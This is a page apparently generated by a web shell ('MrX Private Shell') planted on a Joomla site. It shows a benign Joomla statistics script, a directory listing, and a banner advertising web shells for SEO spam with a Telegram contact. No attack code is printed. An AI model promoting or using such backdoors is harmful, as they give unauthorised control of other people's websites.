__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/**
* @copyright (C) 2018 Open Source Matters, Inc. <https://www.joomla.org>
* @license GNU General Public License version 2 or later; see LICENSE.txt
* @since 3.5.0
*/
(document => {
// Selectors used by this script
const statsDataTogglerId = 'js-pstats-data-details-toggler';
const statsDataDetailsId = 'js-pstats-data-details';
const resetId = 'js-pstats-reset-uid';
const uniqueIdFieldId = 'jform_params_unique_id';
const onToggle = event => {
event.preventDefault();
const element = document.getElementById(statsDataDetailsId);
if (element) {
element.classList.toggle('d-none');
}
};
const onReset = event => {
event.preventDefault();
document.getElementById(uniqueIdFieldId).value = '';
Joomla.submitbutton('plugin.apply');
};
const onBoot = () => {
// Toggle stats details
const toggler = document.getElementById(statsDataTogglerId);
if (toggler) {
toggler.addEventListener('click', onToggle);
}
// Reset the unique id
const reset = document.getElementById(resetId);
if (reset) {
reset.addEventListener('click', onReset);
}
// Cleanup
document.removeEventListener('DOMContentLoaded', onBoot);
};
document.addEventListener('DOMContentLoaded', onBoot);
})(document, Joomla);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| stats-es5.js | File | 1.42 KB | 0664 |
|
| stats-es5.min.js | File | 770 B | 0664 |
|
| stats-es5.min.js.gz | File | 441 B | 0664 |
|
| stats-message-es5.js | File | 3.01 KB | 0664 |
|
| stats-message-es5.min.js | File | 1.58 KB | 0664 |
|
| stats-message-es5.min.js.gz | File | 818 B | 0664 |
|
| stats-message.js | File | 2.59 KB | 0664 |
|
| stats-message.min.js | File | 1.46 KB | 0664 |
|
| stats-message.min.js.gz | File | 776 B | 0664 |
|
| stats.js | File | 1.28 KB | 0664 |
|
| stats.min.js | File | 717 B | 0664 |
|
| stats.min.js.gz | File | 418 B | 0664 |
|